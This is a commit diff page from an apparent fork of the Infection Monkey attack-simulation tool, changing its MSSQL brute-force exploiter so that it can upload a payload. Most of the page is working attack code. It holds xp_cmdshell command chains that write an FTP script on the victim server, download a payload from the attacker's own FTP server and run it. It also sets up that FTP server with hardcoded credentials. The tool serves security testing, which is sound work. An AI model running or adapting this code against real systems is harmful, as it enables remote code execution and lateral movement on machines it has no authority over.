p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Merge pull request #276 from VakarisZ/mssql_partial_fix 

MSSQL now is able to upload a payload
This commit is contained in:
Daniel Goldberg 2019-03-09 12:24:47 +02:00 committed by GitHub
parent de2e0d88ba c205636b10
commit 3cd85ff85a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 20 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -1,6 +1,4 @@
import os import os
import platform
from os import path
import logging import logging
import pymssql import pymssql
@ -19,8 +17,8 @@ class MSSQLExploiter(HostExploiter):
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
LOGIN_TIMEOUT = 15 LOGIN_TIMEOUT = 15
SQL_DEFAULT_TCP_PORT = '1433' SQL_DEFAULT_TCP_PORT = '1433'
DEFAULT_PAYLOAD_PATH_WIN = os.path.expandvars(r'%TEMP%\~PLD123.bat') DEFAULT_PAYLOAD_PATH_WIN = os.path.expandvars(r'~PLD123.bat')
DEFAULT_PAYLOAD_PATH_LINUX = '/tmp/~PLD123.bat' DEFAULT_PAYLOAD_PATH_LINUX = '~PLD123.bat'
def __init__(self, host): def __init__(self, host):
super(MSSQLExploiter, self).__init__(host) super(MSSQLExploiter, self).__init__(host)
@ -62,7 +60,6 @@ class MSSQLExploiter(HostExploiter):
return False return False
def handle_payload(self, cursor, payload): def handle_payload(self, cursor, payload):
""" """
Handles the process of payload sending and execution, prepares the attack and details. Handles the process of payload sending and execution, prepares the attack and details.
@ -74,7 +71,7 @@ class MSSQLExploiter(HostExploiter):
True or False depends on process success True or False depends on process success
""" """
chosen_attack = self.attacks_list[0](payload, cursor, self.host.ip_addr) chosen_attack = self.attacks_list[0](payload, cursor, self.host)
if chosen_attack.send_payload(): if chosen_attack.send_payload():
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload)) LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))

40
monkey/infection_monkey/exploit/mssqlexec_utils.py
View File

@ -8,6 +8,7 @@ from infection_monkey.exploit.tools import get_interface_to_target
from pyftpdlib.authorizers import DummyAuthorizer from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer from pyftpdlib.servers import FTPServer
from time import sleep
__author__ = 'Maor Rayzin' __author__ = 'Maor Rayzin'
@ -17,7 +18,8 @@ FTP_SERVER_PORT = 1026
FTP_SERVER_ADDRESS = '' FTP_SERVER_ADDRESS = ''
FTP_SERVER_USER = 'brute' FTP_SERVER_USER = 'brute'
FTP_SERVER_PASSWORD = 'force' FTP_SERVER_PASSWORD = 'force'
FTP_WORKING_DIR = '.' FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
FTP_WORK_DIR_LINUX = '/tmp/'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
@ -30,37 +32,29 @@ class FTP(object):
user (str): User for FTP server auth user (str): User for FTP server auth
password (str): Password for FTP server auth password (str): Password for FTP server auth
working_dir (str): The local working dir to init the ftp server on. working_dir (str): The local working dir to init the ftp server on.
""" """
def __init__(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD, def __init__(self, host, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD):
working_dir=FTP_WORKING_DIR):
"""Look at class level docstring.""" """Look at class level docstring."""
self.dst_ip = host.ip_addr
self.user = user self.user = user
self.password = password self.password = password
self.working_dir = working_dir self.working_dir = FTP_WORK_DIR_LINUX if 'linux' in host.os['type'] else FTP_WORK_DIR_WINDOWS
def run_server(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD, def run_server(self):
working_dir=FTP_WORKING_DIR):
""" Configures and runs the ftp server to listen forever until stopped. """ Configures and runs the ftp server to listen forever until stopped.
Args:
user (str): User for FTP server auth
password (str): Password for FTP server auth
working_dir (str): The local working dir to init the ftp server on.
""" """
# Defining an authorizer and configuring the ftp user # Defining an authorizer and configuring the ftp user
authorizer = DummyAuthorizer() authorizer = DummyAuthorizer()
authorizer.add_user(user, password, working_dir, perm='elradfmw') authorizer.add_user(self.user, self.password, self.working_dir, perm='elr')
# Normal ftp handler # Normal ftp handler
handler = FTPHandler handler = FTPHandler
handler.authorizer = authorizer handler.authorizer = authorizer
address = (FTP_SERVER_ADDRESS, FTP_SERVER_PORT) address = (get_interface_to_target(self.dst_ip), FTP_SERVER_PORT)
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword # Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
self.server = FTPServer(address, handler) self.server = FTPServer(address, handler)
@ -100,14 +94,15 @@ class CmdShellAttack(AttackHost):
Args: Args:
payload_path (str): The local path of the payload file payload_path (str): The local path of the payload file
cursor (pymssql.conn.obj): A cursor object from pymssql.connect to run commands with. cursor (pymssql.conn.obj): A cursor object from pymssql.connect to run commands with.
host (model.host.VictimHost): Host this attack is going to target
""" """
def __init__(self, payload_path, cursor, dst_ip_address): def __init__(self, payload_path, cursor, host):
super(CmdShellAttack, self).__init__(payload_path) super(CmdShellAttack, self).__init__(payload_path)
self.ftp_server, self.ftp_server_p = self.__init_ftp_server() self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
self.cursor = cursor self.cursor = cursor
self.attacker_ip = get_interface_to_target(dst_ip_address) self.attacker_ip = get_interface_to_target(host.ip_addr)
def send_payload(self): def send_payload(self):
""" """
@ -121,7 +116,6 @@ class CmdShellAttack(AttackHost):
shellcmd1 = """xp_cmdshell "mkdir c:\\tmp& chdir c:\\tmp& echo open {0} {1}>ftp.txt& \ shellcmd1 = """xp_cmdshell "mkdir c:\\tmp& chdir c:\\tmp& echo open {0} {1}>ftp.txt& \
echo {2}>>ftp.txt" """.format(self.attacker_ip, FTP_SERVER_PORT, FTP_SERVER_USER) echo {2}>>ftp.txt" """.format(self.attacker_ip, FTP_SERVER_PORT, FTP_SERVER_USER)
shellcmd2 = """xp_cmdshell "chdir c:\\tmp& echo {0}>>ftp.txt" """.format(FTP_SERVER_PASSWORD) shellcmd2 = """xp_cmdshell "chdir c:\\tmp& echo {0}>>ftp.txt" """.format(FTP_SERVER_PASSWORD)
shellcmd3 = """xp_cmdshell "chdir c:\\tmp& echo get {0}>>ftp.txt& echo bye>>ftp.txt" """\ shellcmd3 = """xp_cmdshell "chdir c:\\tmp& echo get {0}>>ftp.txt& echo bye>>ftp.txt" """\
.format(self.payload_path) .format(self.payload_path)
shellcmd4 = """xp_cmdshell "chdir c:\\tmp& cmd /c ftp -s:ftp.txt" """ shellcmd4 = """xp_cmdshell "chdir c:\\tmp& cmd /c ftp -s:ftp.txt" """
@ -129,11 +123,11 @@ class CmdShellAttack(AttackHost):
# Checking to see if ftp server is up # Checking to see if ftp server is up
if self.ftp_server_p and self.ftp_server: if self.ftp_server_p and self.ftp_server:
try: try:
# Running the cmd on remote host # Running the cmd on remote host
for cmd in shellcmds: for cmd in shellcmds:
self.cursor.execute(cmd) self.cursor.execute(cmd)
sleep(0.5)
except Exception as e: except Exception as e:
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True) LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
@ -174,7 +168,7 @@ class CmdShellAttack(AttackHost):
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
return False return False
except pymssql.OperationalError: except pymssql.OperationalError as e:
LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True) LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
return False return False
@ -193,7 +187,7 @@ class CmdShellAttack(AttackHost):
LOG.error('Error cleaning the attack files using xp_cmdshell, files may remain on host', exc_info=True) LOG.error('Error cleaning the attack files using xp_cmdshell, files may remain on host', exc_info=True)
return False return False
def __init_ftp_server(self): def __init_ftp_server(self, host):
""" """
Init an FTP server using FTP class on a different process Init an FTP server using FTP class on a different process
@ -203,7 +197,7 @@ class CmdShellAttack(AttackHost):
""" """
try: try:
ftp_s = FTP() ftp_s = FTP(host)
multiprocessing.log_to_stderr(logging.DEBUG) multiprocessing.log_to_stderr(logging.DEBUG)
p = multiprocessing.Process(target=ftp_s.run_server) p = multiprocessing.Process(target=ftp_s.run_server)
p.start() p.start()